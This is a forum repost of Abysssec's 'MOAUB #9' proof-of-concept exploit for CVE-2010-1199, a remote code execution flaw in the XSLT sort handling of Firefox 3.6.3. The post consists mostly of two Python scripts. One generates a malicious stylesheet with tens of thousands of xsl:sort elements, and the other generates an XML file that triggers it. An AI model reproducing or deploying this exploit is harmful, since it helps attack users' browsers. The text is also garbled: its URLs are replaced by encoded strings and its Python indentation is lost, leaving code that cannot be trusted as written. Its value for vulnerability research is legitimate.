[转帖]MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

发表于: 2010-9-10 14:14 4079

[转帖]MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

freebsdlin 活跃值

2010-9-10 14:14

4079

'''
  __  __  ____       _ _ ____
|  \/  |/ __ \ /\  | |  | |  _ \
| \  / | |  | | /  \ | |  | | |_) |
| |\/| | |  | |/ /\ \| |  | |  _ <  Day 9 (Binary Analysis)
| |  | | |__| / ____ \ |__| | |_) |
|_|  |_|\____/_/ \_\____/|____/

50fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1z5g2)9J5k6r3#2G2P5X3W2D9L8r3q4Q4x3X3c8X3K9i4u0W2k6X3!0^5i4K6u0V1P5s2y4D9N6q4)9J5k6s2y4G2M7Y4c8Q4x3X3c8J5k6h3#2G2N6r3g2Q4x3X3c8U0L8$3c8W2i4K6u0V1k6i4S2W2j5%4g2@1K9h3!0F1i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1P5g2)9J5c8R3`.`.
7b1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8Y4y4H3L8r3!0A6N6s2y4Q4x3V1k6E0L8$3q4#2j5W2)9J5k6r3c8S2P5e0W2Q4x3X3c8T1j5g2)9J5k6i4A6A6M7l9`.`.

'''

'''
  Title          : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
  Version          : Firefox 3.6.3
  Analysis       : 071K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
  Vendor          : ca2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2G2P5X3W2D9L8r3q4Q4x3X3g2U0L8$3@1`.
  Impact          : High/Critical
  Contact          : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          : @abysssec
  CVE             : CVE-2010-1199
'''
import sys;

myStyle = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://2e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3e0V1&6z5g2)9J5c8W2S2e0e0q4)9J5c8W2c8J5j5h3&6K6k6X3!0J5L8b7`.`.">
<xsl:output method="html"/>
<xsl:template match="/">
<html>
  <head>
<title>Beatles</title>
  </head>
  <body>
<table border="1">
<xsl:for-each select="beatles/beatle">
"""

BlockCount = 43000

count = 1
while(count<BlockCount):
myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n"
count = count + 1

myStyle = myStyle +"""
<tr>
<td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td>
<td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td>
</tr>
</xsl:for-each>
</table>
  </body>
</html>
</xsl:template>

</xsl:stylesheet>
"""
cssFile = open("abysssec.xsl","w")
cssFile.write(myStyle)
cssFile.close()

'''
  __  __  ____       _ _ ____
|  \/  |/ __ \ /\  | |  | |  _ \
| \  / | |  | | /  \ | |  | | |_) |
| |\/| | |  | |/ /\ \| |  | |  _ <
| |  | | |__| / ____ \ |__| | |_) |
|_|  |_|\____/_/ \_\____/|____/

'''

'''
  Title          : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
  Version          : Firefox 3.6.3
  Analysis       : f04K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
  Vendor          : 323K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2G2P5X3W2D9L8r3q4Q4x3X3g2U0L8$3@1`.
  Impact          : High/Critical
  Contact          : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          : @abysssec
  CVE             : CVE-2010-1199
  MOAUB Number    : MOAU_09_BA
'''
import sys;

myStyle = """<?xml version="1.0"?>
<?xml-stylesheet href="abysssec.xsl" type="text/xsl"?>
<beatles>

"""
block = """
<beatle link="http://f59K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6G2K9r3&6D9k6h3&6F1L8$3&6Q4x3X3g2U0L8$3@1`.">
  <name>
"""
BlockCount = 2147483647
rowCount=10
#myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n"
count = 1
while(count<BlockCount):
myStyle = myStyle + """
<beatle link="http://344K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6G2K9r3&6D9k6h3&6F1L8$3&6Q4x3X3g2U0L8$3@1`.">
<name>
"""
myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n"
myStyle = myStyle + """
      <lastname>Lennon</lastname>
   </name>
   </beatle>
   <beatle link="http://22eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8S2N6h3I4E0j5$3y4S2M7Y4c8F1k6i4W2Q4x3X3g2U0L8$3@1`.">
   <name>"""

myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n"
myStyle = myStyle +  """ <lastname>McCartney</lastname>
   </name>
   </beatle>
   <beatle link="http://0aeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3N6W2L8%4u0Y4k6h3S2S2M7Y4u0A6M7$3!0F1i4K6u0W2j5$3!0E0">
   <name>
   """
myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n"
myStyle = myStyle + """
   <lastname>Harrison</lastname>
   </name>
   </beatle>
   <beatle link="http://c9fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4u0A6L8X3N6G2M7%4c8S2M7Y4u0Q4x3X3g2U0L8$3@1`.">
   <name>
   """
myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n"
myStyle = myStyle + """
   <lastname>Starr</lastname>
   </name>
   </beatle>
   <beatle link="http://34dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4N6W2j5Y4g2U0j5i4c8G2M7W2)9J5k6h3y4G2L8b7`.`." real="no">
   <name>
   """
myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n"
myStyle = myStyle +"""
   <lastname>Dunn</lastname>
   </name>
   </beatle>

"""
count = count - 1

myStyle = myStyle +"""
</beatles>
"""
cssFile = open("abyssssec.xml","w")
cssFile.write(myStyle)
cssFile.close()

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・1

免费・0

支持